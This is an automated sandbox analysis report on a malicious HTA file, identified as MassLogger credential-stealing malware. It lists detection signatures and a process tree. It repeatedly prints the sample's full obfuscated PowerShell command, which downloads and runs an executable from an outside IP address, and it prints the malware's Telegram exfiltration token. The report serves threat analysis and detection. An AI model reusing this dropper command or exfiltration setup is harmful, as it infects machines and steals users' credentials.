Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
needagoodplanforsuccesstogetbackbest.hta

Overview

General Information

Sample name:needagoodplanforsuccesstogetbackbest.hta
Analysis ID:1640149
MD5:69de66532cc4a0f299ce46f49e150555
SHA1:84d95b6fb113d7751509702c72f017875d4aefd8
SHA256:17bf3cc6ffe8c17c0d724acadc503305ae2fa70ef5571d2303f5c894538a1045
Tags:htaMassLoggeruser-abuse_ch
Infos:

Detection

Cobalt Strike, MSIL Logger, MassLogger RAT
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected Cobalt Strike Beacon
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Powershell decode and execute
Yara detected Telegram RAT
.NET source code references suspicious native API functions
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 7732 cmdline: mshta.exe "C:\Users\user\Desktop\needagoodplanforsuccesstogetbackbest.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 7776 cmdline: "C:\Windows\system32\cmd.exe" "/C POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'JEd2QVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVGaU5JdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXlSVVR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdU5kcFNxLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9oc28pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJPbFN5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRlS3lvTmQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR3ZBVjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMTAvY3Nvc3MuZXhlIiwiJGVOVjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtTdEFyVC1zTEVlUCgzKTtpTlZvS0UtSVRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[char]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7560 cmdline: POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'JEd2QVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVGaU5JdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXlSVVR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdU5kcFNxLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9oc28pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJPbFN5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRlS3lvTmQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR3ZBVjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMTAvY3Nvc3MuZXhlIiwiJGVOVjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtTdEFyVC1zTEVlUCgzKTtpTlZvS0UtSVRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[char]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 4064 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 2296 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEFD.tmp" "c:\Users\user\AppData\Local\Temp\dkgvurtz\CSCEFC899AF36F541BC9861FF65BE4F3BB.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • csoss.exe (PID: 2576 cmdline: "C:\Users\user\AppData\Roaming\csoss.exe" MD5: 54DE0C8E192E7BC71B6D284FFF136296)
          • RegSvcs.exe (PID: 5304 cmdline: "C:\Users\user\AppData\Roaming\csoss.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7598843355:AAHehybWWiULdkPS1RLFstdr4_yw-SdkoII", "Telegram Chatid": "7668947425"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
        00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000006.00000002.1393958213.0000000002410000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0xf1df:$a1: get_encryptedPassword
          • 0xf507:$a2: get_encryptedUsername
          • 0xef7a:$a3: get_timePasswordChanged
          • 0xf09b:$a4: get_passwordField
          • 0xf1f5:$a5: set_encryptedPassword
          • 0x10b51:$a7: get_logins
          • 0x10802:$a8: GetOutlookPasswords
          • 0x105f4:$a9: StartKeylogger
          • 0x10aa1:$a10: KeyLoggerEventArgs
          • 0x10651:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 17 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          7.2.RegSvcs.exe.430000.0.unpackJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            7.2.RegSvcs.exe.430000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              7.2.RegSvcs.exe.430000.0.unpackJoeSecurity_MSILLoggerYara detected MSIL LoggerJoe Security
                7.2.RegSvcs.exe.430000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  7.2.RegSvcs.exe.430000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0xf1df:$a1: get_encryptedPassword
                  • 0xf507:$a2: get_encryptedUsername
                  • 0xef7a:$a3: get_timePasswordChanged
                  • 0xf09b:$a4: get_passwordField
                  • 0xf1f5:$a5: set_encryptedPassword
                  • 0x10b51:$a7: get_logins
                  • 0x10802:$a8: GetOutlookPasswords
                  • 0x105f4:$a9: StartKeylogger
                  • 0x10aa1:$a10: KeyLoggerEventArgs
                  • 0x10651:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 13 entries

                  Other

                  SourceRuleDescriptionAuthorStrings
                  amsi32_7560.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Suspicious MSHTA Child Process
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'JEd2QVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVGaU5JdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXlSVVR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdU5kcFNxLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9oc28pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJPbFN5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRlS3lvTmQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR3ZBVjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMTAvY3Nvc3MuZXhlIiwiJGVOVjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtTdEFyVC1zTEVlUCgzKTtpTlZvS0UtSVRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[char]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'JEd2QVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVGaU5JdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXlSVVR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdU5kcFNxLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9oc28pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJPbFN5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgI
                    Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'JEd2QVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVGaU5JdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXlSVVR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdU5kcFNxLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9oc28pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJPbFN5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRlS3lvTmQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR3ZBVjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMTAvY3Nvc3MuZXhlIiwiJGVOVjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtTdEFyVC1zTEVlUCgzKTtpTlZvS0UtSVRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[char]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7560, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.cmdline", ProcessId: 4064, ProcessName: csc.exe
                    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7560, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\csoss[1].exe
                    Sigma detected: Dynamic CSharp Compile Artefact
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7560, TargetFilename: C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.cmdline
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'JEd2QVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVGaU5JdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXlSVVR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdU5kcFNxLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9oc28pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJPbFN5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRlS3lvTmQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR3ZBVjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMTAvY3Nvc3MuZXhlIiwiJGVOVjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtTdEFyVC1zTEVlUCgzKTtpTlZvS0UtSVRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[char]34+'))')))", CommandLine: POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'JEd2QVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVGaU5JdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXlSVVR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdU5kcFNxLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9oc28pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJPbFN5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRlS3lvTmQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ

                    Data Obfuscation

                    barindex
                    Sigma detected: Dot net compiler compiles file from suspicious location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkgvurtz\dkgvurtz.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POwERSHell.exe -ex bYpaSS -NoP -w 1 -C deVIcecreDENTiALDeplOYMENt.exE ; IeX($(iEX('[sYSTeM.TeXt.EnCOdIng]'+[cHAr]58+[Char]0X3a+'UtF8.gETStrINg([sYSteM.cOnVERT]'+[ChAR]0X3a+[ChAR]58+'frOMbASe64STrIng('+[CHAr]0x22+'JEd2QVYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVGaU5JdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXlSVVR0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdU5kcFNxLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9oc28pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJPbFN5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNRVNwYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRlS3lvTmQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkR3ZBVjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMTAvY3Nvc3MuZXhlIiwiJGVOVjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtTdEFyVC1zTEVlUCgzKTtpTlZvS0UtSVRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[char]34+'))')))", ParentImage: 